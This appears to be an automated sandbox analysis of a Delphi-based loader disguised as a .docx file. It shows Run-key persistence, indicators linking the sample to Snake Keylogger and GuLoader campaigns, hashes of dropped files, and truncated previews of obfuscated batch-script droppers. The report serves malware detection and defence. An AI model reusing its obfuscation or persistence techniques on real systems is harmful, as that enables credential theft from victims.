Classification: mal100.troj.spyw.evad.winEXE@21/7@4/4
                                                                                  EGA Information:
                                                                                  • Successful, ratio: 100%
                                                                                  HCA Information:
                                                                                  • Successful, ratio: 96%
                                                                                  • Number of executed functions: 210
                                                                                  • Number of non-executed functions: 57
                                                                                  Cookbook Comments:
                                                                                  • Found application associated with file extension: .exe
                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                  • Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.190.147.2, 20.190.177.82, 20.12.23.50
                                                                                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, otelrules.azureedge.net, login.live.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                  • VT rate limit hit for: D.G Governor Istek,Docx.exe
Time | Type | Description
10:16:38 | API Interceptor | 2x Sleep call for process: D.G Governor Istek,Docx.exe modified
10:16:55 | API Interceptor | 4x Sleep call for process: Cneehezx.PIF modified
10:17:02 | API Interceptor | 689196x Sleep call for process: xzeheenC.pif modified
16:16:46 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Cneehezx C:\Users\Public\Cneehezx.url
16:16:54 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Cneehezx C:\Users\Public\Cneehezx.url
Match | Associated Sample Name / URL | Detection | Threat Name | Context
149.154.167.220 | Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe | malicious | Snake Keylogger, VIP Keylogger |
 | PAYMENT SWIFT AND SOA TT07180016-24_pdf.exe | malicious | GuLoader, MassLogger RAT |
 | chrome11.exe | malicious | Unknown |
 | chrome11.exe | malicious | Unknown |
 | urS3jQ9qb5.jar | malicious | Can Stealer |
 | urS3jQ9qb5.jar | malicious | Can Stealer |
 | RFQ December-January Forcast and TCL.exe | malicious | GuLoader, MassLogger RAT |
 | FileScanner.exe | malicious | Unknown |
 | PK241200518-EMAIL RELEASE-pdf.exe | malicious | Snake Keylogger, VIP Keylogger |
 | stealer.jar | malicious | Can Stealer |
185.166.143.49 | http://jasonj002.bitbucket.io/ | malicious | HTMLPhisher | jasonj002.bitbucket.io/
132.226.247.73 | 0001.exe | malicious | Snake Keylogger | checkip.dyndns.org/
 | Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
 | ugpJX5h56S.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
 | hesaphareketi-01.pdf.exe | malicious | Snake Keylogger | checkip.dyndns.org/
                                                                                                      Shipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • checkip.dyndns.org/
                                                                                                      DEC 2024 RFQ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • checkip.dyndns.org/
                                                                                                      Request for quote.docGet hashmaliciousSnake KeyloggerBrowse
                                                                                                      • checkip.dyndns.org/
                                                                                                      Hesap_Hareketleri_10122024_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • checkip.dyndns.org/
                                                                                                      Hesap_Hareketleri_09122024_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • checkip.dyndns.org/
                                                                                                      E-dekont.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                      • checkip.dyndns.org/
                                                                                                                      Process:C:\Users\user\Desktop\D.G Governor Istek,Docx.exe
                                                                                                                      File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Cneehezx.PIF">), ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):104
                                                                                                                      Entropy (8bit):5.074788252940729
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XM1d1sbxrcUy4RPNn:HRYFVmTWDyzwExrl19Nn
                                                                                                                      MD5:1D42AE8B7F4540F199B4FA6E57A944A0
                                                                                                                      SHA1:31415E02DA4BE9626ECB68D924CD7FC3D7D8959A
                                                                                                                      SHA-256:62CFD805845DC5EE146D3A3D90317293DB3DCF38F36410754AF22C58972DA5DB
                                                                                                                      SHA-512:F789375754F01684AA1AC8608A8F3D4E066CE1CE657E76FFA214780CFB62791966C1B6392C071131D5CA947EEBAB88159EE8EBC5E91E55CB592DC8F29C4E4EED
                                                                                                                      Malicious:true
                                                                                                                      Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Cneehezx.PIF"..IconIndex=960091..HotKey=38..
                                                                                                                      Process:C:\Users\user\Desktop\D.G Governor Istek,Docx.exe
                                                                                                                      File Type:DOS batch file, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):15789
                                                                                                                      Entropy (8bit):4.658965888116939
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:wleG1594aKczJRP1dADCDswtJPZ9KZVst1U:LA4aLz08JaJ
                                                                                                                      MD5:CCE3C4AEE8C122DD8C44E64BD7884D83
                                                                                                                      SHA1:C555C812A9145E2CBC66C7C64BA754B0C7528D6D
                                                                                                                      SHA-256:4A12ABB62DD0E5E1391FD51B7448EF4B9DA3B3DC83FF02FB111E15D6A093B5E8
                                                                                                                      SHA-512:EA23EDFB8E3CDA49B78623F6CD8D0294A4F4B9B11570E8478864EBDEE39FCC6B8175B52EB947ED904BE27B5AF2535B9CA08595814557AE569020861A133D827D
                                                                                                                      Malicious:false
                                                                                                                      Preview:.@echo off..@% %e%.%c%o..%h%. .......%o%r.r.r.....% %.......%o%..%f% .%f%o%..s%...... .%e%.r.%t%...o..r.% %.....%"%.......%u%.%T%r..%A%..%j%r........%=%.. o......%s%....o...%e%.....%t%.% %........%"%.r.......o%..%uTAj%"%.. . ..%N%.r r.... %U%... .oo...%M%r.........%j%.....%=%.....o....%=%.%"%r...... %..%uTAj%"% .....%m%..oo%X%.o.. %m%.....or.%w%....%O%.%g%.....%B%.o .r.. %W%..%D%........%t%o.r...%%NUMj%h% ...o.%t%..%t%o......o%p%.........%"% .r%..%uTAj%"% .... ..%G%...o.. ..%n%..rr..%j%..o......%D%...o .r..%R%r.
                                                                                                                      Process:C:\Users\user\Desktop\D.G Governor Istek,Docx.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):583193
                                                                                                                      Entropy (8bit):7.3073922634117
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12288:iF0qv+93X92OirXQ2mHlHCrVs1NY/Ac95S5XCswppBYdH:i+qG9IOiM2iU/50CtQ
                                                                                                                      MD5:4F30E1377F4BDE432BFCDF9E0545EEC6
                                                                                                                      SHA1:048E58EBD70C38E15AD1BEE80C3B50FB149EAC02
                                                                                                                      SHA-256:7FFEBB424079AA78D67B79ABCE9CDF79F3E0590F2452823400FFE2BB45BAA23A
                                                                                                                      SHA-512:07074EAA924050F6D34102D16DBECAA6B4E279FD452BA0732CABDD308CAF732C7757D0E2245ABE2A8DDFA81E3F261B05BA4F7C6FD27E47E2D84CC3904C0BE97E
                                                                                                                      Malicious:true
                                                                                                                      Process:C:\Users\user\Desktop\D.G Governor Istek,Docx.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1019392
                                                                                                                      Entropy (8bit):7.007121444882125
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24576:Mt8U4ln77mcFj7LF6iNQj0KyEB1zcwfPMed:0wnRQj0KyEB1zcwfPME
                                                                                                                      MD5:7D212D2DAB091BEC36A906828D270C65
                                                                                                                      SHA1:4D251936D754C47EE58E3913A99E2659E731AC98
                                                                                                                      SHA-256:4390AD0A5BD9184058CC6E2FBE64F896F71B0F0E95C27D8769837C6F979B11DB
                                                                                                                      SHA-512:AC59413964D9C9A55BCA14AFA22834B50D4CB113107D647B50B94CE49B82D887A61D31E99DAA0450EF35F2DF44B7CC524738CDF36007B0E357EB3554CFBFFE40
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      • Antivirus: ReversingLabs, Detection: 53%
                                                                                                                      Process:C:\Users\user\Desktop\D.G Governor Istek,Docx.exe
                                                                                                                      File Type:DOS batch file, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):8556
                                                                                                                      Entropy (8bit):4.623706637784657
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:dSSQx41VVrTlS2owuuWTtkY16Wdhdsu0mYKDCIfYaYuX1fcDuy:Vrhgwuua5vdnQaCIVJF6uy
                                                                                                                      MD5:60CD0BE570DECD49E4798554639A05AE
                                                                                                                      SHA1:BD7BED69D9AB9A20B5263D74921C453F38477BCB
                                                                                                                      SHA-256:CA6A6C849496453990BECEEF8C192D90908C0C615FA0A1D01BCD464BAD6966A5
                                                                                                                      SHA-512:AB3DBDB4ED95A0CB4072B23DD241149F48ECFF8A69F16D81648E825D9D81A55954E5DD9BC46D3D7408421DF30C901B9AD1385D1E70793FA8D715C86C9E800C57
                                                                                                                      Malicious:true
                                                                                                                      Preview:@echo off..set "MJtc=Iet "..@%.r.......%e%...%c%...r....%h%.....%o%........% % .....%o%...%f%.o.%f%......%..s%.......%e%.%t%.. .....% %.rr.. .%"%...%w%......%o%...o..%t%r.....%c%....%=%... . .%s%...... %e%....%t%....% %........ %"% o...%..%wotc%"%.%n% r .%O%...%P%.. ..%t%.%=%...... o..%=%......%"%....r...%..%wotc%"aeeYdDdanR%nOPt%s://"..%wotc%"%..........%a%.%e%......%e%.r..%Y%..%d%.....r....%D%.. %d% ... .%a%.. ...%n%.. ..%R%........%%nOPt%s%...... .%:%.. %/%....%/%r......%"%.....r.%..%wotc%"%...... ...%U%.o..%g%.r.%
                                                                                                                      Process:C:\Users\user\Desktop\D.G Governor Istek,Docx.exe
                                                                                                                      File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (420), with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):46543
                                                                                                                      Entropy (8bit):4.705001079878445
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:Ud6T6yIssKMyD/LgZ0+9Z2noufIBUEADZQp2H8ZLq:UdQFIssKMyjL4X2T8UbZT
                                                                                                                      MD5:637A66953F03B084808934ED7DF7192F
                                                                                                                      SHA1:D3AE40DFF4894972A141A631900BD3BB8C441696
                                                                                                                      SHA-256:41E1F89A5F96F94C2C021FBC08EA1A10EA30DAEA62492F46A7F763385F95EC20
                                                                                                                      SHA-512:2A0FEDD85722A2701D57AA751D5ACAA36BBD31778E5D2B51A5A1B21A687B9261F4685FD12E894244EA80B194C76E722B13433AD9B649625D2BC2DB4365991EA3
                                                                                                                      Malicious:false
                                                                                                                      Preview:@echo off..set "EPD=sPDet "..@%...... or%e%.........%c%......%h%.........o%o%.or......% %.o.ro...%o%.%f%...r.....%f%....r....%..s%. %e%.....%t% % % rrr....%"%.....%E%....%J%.. ....%O%.%h% .......%=%........%s%.. ..%e%....%t%....% %...o...%"%.%..%EJOh%"%.%r% %H%..%C%........%N%....o ....%=%..........%=% .%"%..%..%EJOh%"%.....%K%.%z%..r%j%........%L%..%c%. o.......%f%. o..%x%.%X%.........r%V%.%J%.....%%rHCN%k%.... ...%"%........%..%EJOh%"%.o.....%a%or%g%..o.... ..%u% ..%P%.....o...%X%.. .......%c% .....%U%.%I%. .
                                                                                                                      Process:C:\Users\user\Desktop\D.G Governor Istek,Docx.exe
                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):175800
                                                                                                                      Entropy (8bit):6.631791793070417
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3072:qjyOm0e6/bIhbuwxlEb1MpG+xUEyAn0fYuDGOpPXFZ7on+gUxloDMq:qjyl6ebX45OG+xUEWfYUGOpPXFZ7on+G
                                                                                                                      MD5:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                                      SHA1:2A001C30BA79A19CEAF6A09C3567C70311760AA4
                                                                                                                      SHA-256:BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C
                                                                                                                      SHA-512:C7F5BAAD732424B975A426867D3D8B5424AA830AA172ED0FF0EF630070BF2B4213750E123A36D8C5A741E22D3999CA1D7E77C62D4B77D6295B20A38114B7843C
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                      Joe Sandbox View:
• Filename: qDKTsL1y44.exe, Detection: malicious
• Filename: PRODUCT.bat, Detection: malicious
• Filename: purchaseorder.bat, Detection: malicious
• Filename: PO11550.exe, Detection: malicious
• Filename: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, Detection: malicious
• Filename: PCMNil7wkU.exe, Detection: malicious
• Filename: tTIYCp2sf4.exe, Detection: malicious
• Filename: Re_Porforma_Invoice_60_downpayment_-_PT_Era_F1909003_Project_Kupang.exe, Detection: malicious
                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Entropy (8bit):7.007121444882125
                                                                                                                      TrID:
                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.81%
                                                                                                                      • Windows Screen Saver (13104/52) 0.13%
                                                                                                                      • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                      File name:D.G Governor Istek,Docx.exe
                                                                                                                      File size:1'019'392 bytes
                                                                                                                      MD5:7d212d2dab091bec36a906828d270c65
                                                                                                                      SHA1:4d251936d754c47ee58e3913a99e2659e731ac98
                                                                                                                      SHA256:4390ad0a5bd9184058cc6e2fbe64f896f71b0f0e95c27d8769837c6f979b11db
                                                                                                                      SHA512:ac59413964d9c9a55bca14afa22834b50d4cb113107d647b50b94ce49b82d887a61d31e99daa0450ef35f2df44b7cc524738cdf36007b0e357eb3554cfbffe40
                                                                                                                      SSDEEP:24576:Mt8U4ln77mcFj7LF6iNQj0KyEB1zcwfPMed:0wnRQj0KyEB1zcwfPME
                                                                                                                      TLSH:2925AE32F1005976DD26A1F84C72C6F8641ABD313F27AC87F6B56D989E39B887C24193
                                                                                                                      Icon Hash:1f7effffffffff3f
                                                                                                                      Entrypoint:0x473804
                                                                                                                      Entrypoint Section:.itext
                                                                                                                      Digitally signed:false
                                                                                                                      Imagebase:0x400000
                                                                                                                      Subsystem:windows gui
                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                      DLL Characteristics:
                                                                                                                      Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                                      TLS Callbacks:
                                                                                                                      CLR (.Net) Version:
                                                                                                                      OS Version Major:4
                                                                                                                      OS Version Minor:0
                                                                                                                      File Version Major:4
                                                                                                                      File Version Minor:0
                                                                                                                      Subsystem Version Major:4
                                                                                                                      Subsystem Version Minor:0
                                                                                                                      Import Hash:c8740fc6ceabb3b749c3b5b31246f4e4
                                                                                                                      Instruction
                                                                                                                      push ebp
                                                                                                                      mov ebp, esp
                                                                                                                      add esp, FFFFFFF0h
                                                                                                                      mov eax, 00472770h
                                                                                                                      call 00007F3F28ADE471h
                                                                                                                      mov eax, dword ptr [004E066Ch]
                                                                                                                      mov eax, dword ptr [eax]
                                                                                                                      call 00007F3F28B30675h
                                                                                                                      mov ecx, dword ptr [004E0764h]
                                                                                                                      mov eax, dword ptr [004E066Ch]
                                                                                                                      mov eax, dword ptr [eax]
                                                                                                                      mov edx, dword ptr [0047233Ch]
                                                                                                                      call 00007F3F28B30675h
                                                                                                                      mov eax, dword ptr [004E066Ch]
                                                                                                                      mov eax, dword ptr [eax]
                                                                                                                      call 00007F3F28B306E9h
                                                                                                                      call 00007F3F28ADC45Ch
                                                                                                                      lea eax, dword ptr [eax+00h]

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xe5000 | 0x26b6 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xf1000 | 0x10400 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xea000 | 0x6e8c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xe9000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xe571c | 0x604 | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x719c0 | 0x71a00 | c20c03fd36d5c6a0f5f2d60e61342924 | False | 0.5268796410891089 | data | 6.554263214536427 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext | 0x73000 | 0x84c | 0xa00 | e9a65ab665fe60801328ffc6f137da75 | False | 0.527734375 | data | 5.5780106542915835 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x74000 | 0x6c800 | 0x6c800 | 5f020c0c908042c75483e4983c9847a3 | False | 0.3889913954493088 | data | 6.614342699532481 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss | 0xe1000 | 0x36b4 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0xe5000 | 0x26b6 | 0x2800 | 1ccb97a5a4355e75c3a3fc645dd0b749 | False | 0.309765625 | data | 4.905692986550938 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0xe8000 | 0x34 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0xe9000 | 0x18 | 0x200 | aaefc7498fcb77b5ed918f8d25bd6004 | False | 0.05078125 | data | 0.2069200177871819 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xea000 | 0x6e8c | 0x7000 | 337ed535b030e2648bb3b67f6124d43d | False | 0.6292898995535714 | data | 6.663115031589674 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc | 0xf1000 | 0x10400 | 0x10400 | 780d920e700e79be7d346383e076ef83 | False | 0.4636268028846154 | data | 6.013951978737078 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0xf1b18 | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | English | United States | 0.38636363636363635
RT_CURSOR | 0xf1c4c | 0x134 | data | English | United States | 0.4642857142857143
RT_CURSOR | 0xf1d80 | 0x134 | data | English | United States | 0.4805194805194805
RT_CURSOR | 0xf1eb4 | 0x134 | data | English | United States | 0.38311688311688313
RT_CURSOR | 0xf1fe8 | 0x134 | data | English | United States | 0.36038961038961037
RT_CURSOR | 0xf211c | 0x134 | data | English | United States | 0.4090909090909091
RT_CURSOR | 0xf2250 | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | English | United States | 0.4967532467532468
RT_BITMAP | 0xf2384 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.43103448275862066
RT_BITMAP | 0xf2554 | 0x1e4 | Device independent bitmap graphic, 36 x 19 x 4, image size 380 | English | United States | 0.46487603305785125
RT_BITMAP | 0xf2738 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.43103448275862066
RT_BITMAP | 0xf2908 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39870689655172414
RT_BITMAP | 0xf2ad8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.4245689655172414
RT_BITMAP | 0xf2ca8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5021551724137931
RT_BITMAP | 0xf2e78 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5064655172413793
RT_BITMAP | 0xf3048 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39655172413793105
RT_BITMAP | 0xf3218 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5344827586206896
RT_BITMAP | 0xf33e8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39655172413793105
RT_BITMAP | 0xf35b8 | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128 | English | United States | 0.4870689655172414
RT_ICON | 0xf36a0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 1889 x 1889 px/m | | | 0.4228723404255319
RT_ICON | 0xf3b08 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 1889 x 1889 px/m | | | 0.29918032786885246
RT_ICON | 0xf4490 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 1889 x 1889 px/m | | | 0.2535178236397749
RT_ICON | 0xf5538 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 1889 x 1889 px/m | | | 0.18329875518672198
RT_DIALOG | 0xf7ae0 | 0x52 | data | | | 0.7682926829268293
RT_DIALOG | 0xf7b34 | 0x52 | data | | | 0.7560975609756098
RT_STRING | 0xf7b88 | 0x244 | data | | | 0.46379310344827585
RT_STRING | 0xf7dcc | 0x188 | data | | | 0.5943877551020408
RT_STRING | 0xf7f54 | 0xc8 | data | | | 0.685
RT_STRING | 0xf801c | 0x118 | data | | | 0.6035714285714285
RT_STRING | 0xf8134 | 0x3a8 | data | | | 0.4305555555555556
RT_STRING | 0xf84dc | 0x3a4 | data | | | 0.38197424892703863
RT_STRING | 0xf8880 | 0x370 | data | | | 0.4022727272727273
RT_STRING | 0xf8bf0 | 0x3cc | data | | | 0.33539094650205764
RT_STRING | 0xf8fbc | 0x214 | data | | | 0.49624060150375937
RT_STRING | 0xf91d0 | 0xcc | data | | | 0.6274509803921569
RT_STRING | 0xf929c | 0x194 | data | | | 0.5643564356435643
RT_STRING | 0xf9430 | 0x3c4 | data | | | 0.3288381742738589
RT_STRING | 0xf97f4 | 0x338 | data | | | 0.42961165048543687
RT_STRING | 0xf9b2c | 0x294 | data | | | 0.42424242424242425
RT_RCDATA | 0xf9dc0 | 0x10 | data | | | 1.5
RT_RCDATA | 0xf9dd0 | 0x304 | data | | | 0.7033678756476683
RT_RCDATA | 0xfa0d4 | 0x712a | Delphi compiled form 'TForm1' | | | 0.6897134967207456
RT_GROUP_CURSOR | 0x101200 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.25
RT_GROUP_CURSOR | 0x101214 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.25
RT_GROUP_CURSOR | 0x101228 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x10123c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x101250 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x101264 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x101278 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_ICON | 0x10128c | 0x3e | data | | | 0.8709677419354839

DLL | Import
oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
user32.dll | GetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
kernel32.dll | GetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
user32.dll | CreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
